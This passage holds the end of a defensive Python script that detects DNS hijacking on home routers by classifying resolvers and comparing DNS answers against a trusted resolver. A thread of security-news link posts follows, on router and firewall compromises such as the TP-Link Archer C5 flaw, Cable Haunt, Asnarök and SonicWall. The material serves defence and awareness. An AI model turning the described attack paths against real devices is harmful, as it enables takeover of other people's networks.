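    if ip_str in EXPECTED_DNS:
        return "expected"
    ip = ipaddress.ip_address(ip_str)
    if ip.is_loopback or any(ip in net for net in LAN_NETS):
        return "lan"                   # normally the router itself forwarding upstream
    return "unexpected-public"         # not rogue by IoC, but not what the ISP gave you


def audit_resolvers(text):
    """[(resolver, verdict), ...] in the order the client would try them."""
    return [(ip, classify(ip)) for ip in parse_resolvers(text)]


def compare_answers(observed, trusted):
    """Domains whose A record from the configured resolver differs from the
    trusted resolver's answer. Run the same query twice, once through the
    router and once against a resolver you control, and diff the results."""
    return sorted(d for d in trusted if observed.get(d) != trusted[d])


# Constructed sample: a client on a hijacked router.
SAMPLE_RESOLV_CONF = (
    "search home.lan\n"
    "nameserver 66.70.173.48\n"
    "nameserver 192.168.1.1\n"
    "nameserver 198.51.100.20\n"
)
TRUSTED_ANSWERS = {"bank.example": "192.0.2.10", "mail.example": "192.0.2.11"}
OBSERVED_ANSWERS = {"bank.example": "203.0.113.66", "mail.example": "192.0.2.11"}

if __name__ == "__main__":
    print(audit_resolvers(SAMPLE_RESOLV_CONF))
    print(compare_answers(OBSERVED_ANSWERS, TRUSTED_ANSWERS))
```

A resolver that classifies as "lan" still deserves a look: the rogue entry may sit in the router's own WAN DNS settings, with the router forwarding to it, so the second check (comparing answers) is the one that catches the hijack regardless of where the setting was changed.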
Tomi Engdahl says:
https://www.zdnet.com/article/this-aggressive-iot-malware-is-forcing-wi-fi-routers-to-join-its-botnet-army/?ftag=COS-05-10aaa0h&utm_campaign=trueAnthem%3A+Trending+Content&utm_content=5dbaf0108021ed000132d25e&utm_medium=trueAnthem&utm_source=facebook
Tomi Engdahl says:
A Zero-day Vulnerability in TP-Link Router Lets Hackers Gain Admin Privilege & Take Full Control of It Remotely
https://gbhackers.com/tp-link-router/
Researchers discovered a new firmware vulnerability in TP-Link Archer C5 (v4) routers that lets an attacker obtain the admin password and allows them to remotely take over the router.
Once the vulnerability has been successfully exploited, a remote attacker can take over the router configuration through Telnet on the local area network (LAN) and connect to a File Transfer Protocol (FTP) server via both LAN and WAN.
The vulnerability is marked as “Critical” severity since it grants unauthorized third-party access due to improper authentication, and it affects the TP-Link Archer C5 router deployed in both home and business environments.
will allow an attacker to enable the Guest WiFi, through which the attacker enters the internal network.
An attacker could trigger the vulnerability just by sending the vulnerable HTTP request to be granted access to the device.
Tomi Engdahl says:
https://cablehaunt.com/
Cable Haunt is a critical vulnerability found in cable modems from various manufacturers across the world. The vulnerability enables remote attackers to gain complete control of a cable modem, through an endpoint on the modem. Your cable modem is in charge of the internet traffic for all devices on the network. Cable Haunt might therefore be exploited to intercept private messages, redirect traffic, or participate in botnets. [...]
Tomi Engdahl says:
Linksys asks users to reset passwords after hackers hijacked home routers last month
https://www.zdnet.com/article/linksys-asks-users-to-reset-passwords-after-hackers-hijacked-home-routers-last-month/
Linksys locks Smart WiFi cloud accounts and asks users to reset passwords after hackers hijacked routers to redirect traffic to malware sites.
Tomi Engdahl says:
“Asnarök” Trojan targets firewalls
https://news.sophos.com/en-us/2020/04/26/asnarok/
Customized malware used to compromise physical and virtual firewalls.
As we described last week in this KBA, Sophos and its customers were the victims of a coordinated attack by an unknown adversary. This attack revealed a previously unknown SQL injection vulnerability that led to remote code execution on some of our firewall products. As described in the KBA, the vulnerability has since been remediated.
There was significant orchestration involved in the execution of the attack, using a chain of Linux shell scripts that eventually downloaded ELF binary executable malware compiled for a firewall operating system. This attack targeted Sophos products and apparently was intended to steal sensitive information from the firewall.
Tomi Engdahl says:
Cloud firewall management API SNAFU put 500k SonicWall customers at risk
https://www.pentestpartners.com/security-blog/cloud-firewall-management-api-snafu-put-500k-sonicwall-customers-at-risk/
I found a security issue so serious that we then spent £££ on our own SonicWall products in order to independently validate the issue, to be certain it wasn’t just our client that was affected. What I discovered was a trivial method to compromise every single cloud managed device attached to mysonicwall.com, affecting around 1.9 million user groups across hundreds of thousands of organisations. At least 10 million individual devices were affected. Disclosure was initially very positive, then went rapidly downhill as SonicWall procrastinated with a fix and refused to take down the vulnerable functionality in the meantime, knowingly leaving their customers exposed for a full 17 days.